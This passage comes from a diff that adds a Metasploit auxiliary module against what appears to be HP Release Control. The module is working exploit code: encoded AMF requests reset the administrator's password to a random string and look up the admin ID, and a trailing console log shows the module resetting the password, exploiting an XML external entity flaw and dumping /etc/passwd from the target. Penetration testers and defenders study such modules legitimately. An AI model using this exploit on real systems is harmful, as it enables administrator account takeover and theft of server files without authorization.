9oZWFkZXJzE29wZXJhdGlvbglib2R5DXNvdXJjZR1yZW1vdGVQYXNzd29yZB1yZW1vdGVVc2VybmFtZRVwYXJhbWV0ZXJzE21lc3NhZ2VJZBV0aW1lVG9MaXZlEWNsaWVudElkF2Rlc3RpbmF0aW9uBQAAAAAAAAAACiMBCURTSWQVRFNFbmRwb2ludAZJREQ2OEVEREUtNTYxQS0zM0U0LTQ1NTgtODhFN0ZGNkUxQzFFBg1teS1hbWYGM3VwZGF0ZUdlbmVyYWxVc2VyU2V0dGluZ3MJCwECBgtlbl9VUwYVRXRjL0dNVCsxMgMDAQEBCgdDZmxleC5tZXNzYWdpbmcuaW8uQXJyYXlDb2xsZWN0aW9uCQsBAgYkBiYDAwZJQTlCNUZBRkQtQzA0Ny0zMDcyLThDQUEtRkQ4RkFGRDc2OERCBQAAAAAAAAAABklERDZEMTNENS0yMTBDLTJEMDktMDBCOS1DNTRFRTc1NzQ1MjYGF3VzZXJTZXJ2aWNlAARudWxsAAMvMzL/////EQkDAQqBQ09mbGV4Lm1lc3NhZ2luZy5tZXNzYWdlcy5SZW1vdGluZ01lc3NhZ2UTdGltZXN0YW1wD2hlYWRlcnMTb3BlcmF0aW9uCWJvZHkNc291cmNlHXJlbW90ZVBhc3N3b3JkHXJlbW90ZVVzZXJuYW1lFXBhcmFtZXRlcnMTbWVzc2FnZUlkFXRpbWVUb0xpdmURY2xpZW50SWQXZGVzdGluYXRpb24FAAAAAAAAAAAKIwEJRFNJZBVEU0VuZHBvaW50BklERDY4RURERS01NjFBLTMzRTQtNDU1OC04OEU3RkY2RTFDMUUGDW15LWFtZgYldXBkYXRlVXNlclBhc3N3b3JkCQUBBg8xNzY5NDcyBhFwYXNzdzByZAEBAQoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkFAQYkBiYGSUREQTlENDQ1LUNFNDgtQTFDMy00MjNBLUZEOEZBRkQ4OUUzRQUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQAEbnVsbAADLzMz/////xEJAwEKgUNPZmxleC5tZXNzYWdpbmcubWVzc2FnZXMuUmVtb3RpbmdNZXNzYWdlE3RpbWVzdGFtcA9oZWFkZXJzE29wZXJhdGlvbglib2R5DXNvdXJjZR1yZW1vdGVQYXNzd29yZB1yZW1vdGVVc2VybmFtZRVwYXJhbWV0ZXJzE21lc3NhZ2VJZBV0aW1lVG9MaXZlEWNsaWVudElkF2Rlc3RpbmF0aW9uBQAAAAAAAAAACiMBCURTSWQVRFNFbmRwb2ludAZJREQ2OEVEREUtNTYxQS0zM0U0LTQ1NTgtODhFN0ZGNkUxQzFFBg1teS1hbWYGK3VwZGF0ZVVzZXJCdXNpbmVzc0NJcwkHAQYPMTc2OTQ3MgoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkBAQoJCQEBAQEBCgkJBwEGJAoICgwGSUU0QTk2NjU5LTQ4ODItOTc2Ny1DMzNBLUZEOEZBRkQ5NEZCQgUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQo=")
+ password = Rex::Text::rand_text_alpha(8)
+ req = req.sub("\x0f1769472", "\x0d"+admin_id).sub("passw0rd", password)
+ send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'messagebroker', 'amf'),
+ 'method' => 'POST',
+ 'ctype' => 'application/x-amf',
+ 'data' => req,
+ 'cookie' => cookie
+ })
+
+ return password
+ end
+
+ def get_admin_id(cookie)
+ req = Rex::Text::decode_base64("AAMAAAABAARudWxsAAMvMjkAAAIPCgAAAAERCoETT2ZsZXgubWVzc2FnaW5nLm1lc3NhZ2VzLlJlbW90aW5nTWVzc2FnZRNvcGVyYXRpb24Nc291cmNlCWJvZHkTbWVzc2FnZUlkE3RpbWVzdGFtcBFjbGllbnRJZBV0aW1lVG9MaXZlD2hlYWRlcnMXZGVzdGluYXRpb24GFXNlYXJjaFVzZXIBCREBCoFTVWNvbS5tZXJjdXJ5Lm9ueXguY2xpZW50LnNlcnZpY2VzLnZvLlVzZXJWTx91c2VyUGVybWlzc2lvbnMRcGFzc3dvcmQLZW1haWwRdXNlckFwcHMddXNlclNldHRpbmdzVk8TdXNlclJvbGVzHWxpbmVPZkJ1c2luZXNzEWxhc3ROYW1lDXVzZXJJRBNsb2dpbk5hbWUTZmlyc3ROYW1lFWJ1c2luZXNzSWQLbGFiZWwKB0NmbGV4Lm1lc3NhZ2luZy5pby5BcnJheUNvbGxlY3Rpb24JAQEBAQoJCQEBAQoJCQEBAQEBAQEBAQEGLAMJAQEEGQQBBAEGSThFNTBBNDUzLUQwRDMtMkVCNC1BNDkzLTAyMTM0RDdEM0E3NgQAAQQACgsBFURTRW5kcG9pbnQGG215LXNlY3VyZS1hbWYJRFNJZAZJRTg3MjYzOUQtOTkwRS0zOUI5LTA1MUMtMDlBOUM1RUJDQUUwAQYXdXNlclNlcnZpY2UK")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'messagebroker', 'amfsecure'),
+ 'method' => 'POST',
+ 'ctype' => 'application/x-amf',
+ 'data' => req,
+ 'cookie' => cookie
+ })
+
+ begin
+ idx = res.body.index("admin admin")
+ idx = idx + "admin admin".length + 25 + 1 + 1
+ id = res.body[idx+1..idx+6]
+ return id
+ rescue
+ return nil
+ end
+ end
+end
+
+__END__
+
+msf auxiliary(hp_release_control_xxe) > show options
+
+Module options (auxiliary/gather/hp_release_control_xxe):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ FILEPATH /etc/passwd yes The filepath to read on the server
+ PASSWORD passw0rd yes The password to authenticate with
+ Proxies http:192.168.1.45:8080 no Use a proxy chain
+ RHOST 192.168.1.109 yes The target address
+ RPORT 8080 yes The target port
+ TARGETURI / yes Base directory path
+ USERNAME username yes The username to authenticate with
+ VHOST no HTTP server virtual host
+
+msf auxiliary(hp_release_control_xxe) > run
+
+[*] Authenticating
+[*] Found admin id: 229376
+[*] Changing admin's password...
+[*] Changed admin password to: ZaDdExMx
+[-] Auxiliary failed: RuntimeError Login failed:
+[-] Call stack:
+[-] /home/bperry/Projects/metasploit-framework/lib/msf/core/module.rb:745:in `fail_with'
+[-] /home/bperry/Projects/metasploit-framework/modules/auxiliary/gather/hp_release_control_xxe.rb:108:in `run'
+[*] Auxiliary module execution completed
+msf auxiliary(hp_release_control_xxe) > run
+
+[*] Authenticating
+[*] Found admin id: 229376
+[*] Changing admin's password...
+[*] Changed admin password to: upvsoveu
+[*] Exploiting XXE...
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
+operator:x:11:0:operator:/root:/sbin/nologin
+games:x:12:100:games:/usr/games:/sbin/nologin
+gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
+ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+nobody:x:99:99:Nobody:/:/sbin/nologin
+dbus:x:81:81:System message bus:/:/sbin/nologin
+vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
+rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
+abrt:x:173:173::/etc/abrt:/sbin/nologin
+rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
+nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
+haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
+ntp:x:38:38::/etc/ntp:/sbin/nologin
+saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
+postfix:x:89:89::/var/spool/postfix:/sbin/nologin
+sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+tcpdump:x:72:72::/:/sbin/nologin
+oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
+release-control:x:500:500::/opt/HP/rc:/bin/bash
+rtkit:x:498:496:RealtimeKit:/proc:/sbin/nologin
+pulse:x:497:495:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
+gdm:x:42:42::/var/lib/gdm:/sbin/nologin
+avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
+fdsa:x:501:501::/home/fdsa:/bin/bash
+[*] Auxiliary module execution completed
+msf auxiliary(hp_release_control_xxe) >
\ No newline at end of file